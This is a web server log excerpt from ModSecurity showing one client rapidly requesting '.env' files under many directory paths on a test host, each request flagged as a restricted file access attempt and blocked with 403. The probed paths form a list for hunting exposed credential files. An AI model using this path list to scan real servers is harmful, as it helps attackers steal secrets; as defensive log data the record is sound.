[Fri Nov 28 03:21:33.261629 2025] [:error] [pid 376636] [client 3.123.22.145:50922] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSkHLW0NQDb3u_nRglh4hwAAABE"]
[Fri Nov 28 03:21:33.878237 2025] [:error] [pid 376637] [client 3.123.22.145:51150] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSkHLVA4g9EMayny11QiuAAAABI"]
[Fri Nov 28 03:21:33.878594 2025] [:error] [pid 376637] [client 3.123.22.145:51150] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSkHLVA4g9EMayny11QiuAAAABI"]
[Fri Nov 28 03:21:33.878870 2025] [:error] [pid 376637] [client 3.123.22.145:51150] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSkHLVA4g9EMayny11QiuAAAABI"]
[Fri Nov 28 03:21:34.342281 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSkHLo6_oD2P8Ob2jfQpvAAAAAQ"]
[Fri Nov 28 03:21:34.342583 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSkHLo6_oD2P8Ob2jfQpvAAAAAQ"]
[Fri Nov 28 03:21:34.342764 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSkHLo6_oD2P8Ob2jfQpvAAAAAQ"]
[Fri Nov 28 03:21:34.343923 2025] [:error] [pid 376635] [client 3.123.22.145:51472] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSkHLoDHfF-o6A_oyS_QvgAAABA"]
[Fri Nov 28 03:21:34.344154 2025] [:error] [pid 376635] [client 3.123.22.145:51472] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSkHLoDHfF-o6A_oyS_QvgAAABA"]
[Fri Nov 28 03:21:34.344342 2025] [:error] [pid 376635] [client 3.123.22.145:51472] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSkHLoDHfF-o6A_oyS_QvgAAABA"]
[Fri Nov 28 03:21:34.767314 2025] [:error] [pid 376634] [client 3.123.22.145:51694] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSkHLiF6En1MEtKBCDcRTgAAAA8"]
[Fri Nov 28 03:21:34.767579 2025] [:error] [pid 376634] [client 3.123.22.145:51694] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSkHLiF6En1MEtKBCDcRTgAAAA8"]
[Fri Nov 28 03:21:34.767790 2025] [:error] [pid 376634] [client 3.123.22.145:51694] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSkHLiF6En1MEtKBCDcRTgAAAA8"]
[Fri Nov 28 03:21:34.923696 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSkHLg-9erAMS4LBdXdtQQAAAAA"]
[Fri Nov 28 03:21:34.923915 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSkHLg-9erAMS4LBdXdtQQAAAAA"]
[Fri Nov 28 03:21:34.924090 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSkHLg-9erAMS4LBdXdtQQAAAAA"]
[Fri Nov 28 03:21:34.924562 2025] [:error] [pid 376639] [client 3.123.22.145:52050] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSkHLtBzWq2scGK6YkHVFgAAABQ"]
[Fri Nov 28 03:21:34.924785 2025] [:error] [pid 376639] [client 3.123.22.145:52050] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSkHLtBzWq2scGK6YkHVFgAAABQ"]
[Fri Nov 28 03:21:34.924981 2025] [:error] [pid 376639] [client 3.123.22.145:52050] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSkHLtBzWq2scGK6YkHVFgAAABQ"]
[Fri Nov 28 03:21:35.317591 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSkHL46_oD2P8Ob2jfQpvQAAAAQ"]
[Fri Nov 28 03:21:35.317825 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSkHL46_oD2P8Ob2jfQpvQAAAAQ"]
[Fri Nov 28 03:21:35.318030 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSkHL46_oD2P8Ob2jfQpvQAAAAQ"]
[Fri Nov 28 03:21:35.740523 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSkHLw-9erAMS4LBdXdtQgAAAAA"]
[Fri Nov 28 03:21:35.740746 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSkHLw-9erAMS4LBdXdtQgAAAAA"]
[Fri Nov 28 03:21:35.740944 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSkHLw-9erAMS4LBdXdtQgAAAAA"]
[Fri Nov 28 03:21:36.097892 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSkHMI6_oD2P8Ob2jfQpvgAAAAQ"]
[Fri Nov 28 03:21:36.098244 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSkHMI6_oD2P8Ob2jfQpvgAAAAQ"]
[Fri Nov 28 03:21:36.099021 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSkHMI6_oD2P8Ob2jfQpvgAAAAQ"]
[Fri Nov 28 03:21:37.707511 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSkHMY6_oD2P8Ob2jfQpwAAAAAQ"]
[Fri Nov 28 03:21:37.707780 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSkHMY6_oD2P8Ob2jfQpwAAAAAQ"]
[Fri Nov 28 03:21:37.707969 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSkHMY6_oD2P8Ob2jfQpwAAAAAQ"]
[Fri Nov 28 03:21:37.962540 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSkHMQ-9erAMS4LBdXdtRAAAAAA"]
[Fri Nov 28 03:21:37.962756 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSkHMQ-9erAMS4LBdXdtRAAAAAA"]
[Fri Nov 28 03:21:37.962959 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSkHMQ-9erAMS4LBdXdtRAAAAAA"]
[Fri Nov 28 03:21:38.501035 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSkHMg-9erAMS4LBdXdtRQAAAAA"]
[Fri Nov 28 03:21:38.501263 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSkHMg-9erAMS4LBdXdtRQAAAAA"]
[Fri Nov 28 03:21:38.501449 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSkHMg-9erAMS4LBdXdtRQAAAAA"]
[Fri Nov 28 03:21:38.887034 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSkHMg-9erAMS4LBdXdtRgAAAAA"]
[Fri Nov 28 03:21:38.887318 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSkHMg-9erAMS4LBdXdtRgAAAAA"]
[Fri Nov 28 03:21:38.887498 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSkHMg-9erAMS4LBdXdtRgAAAAA"]
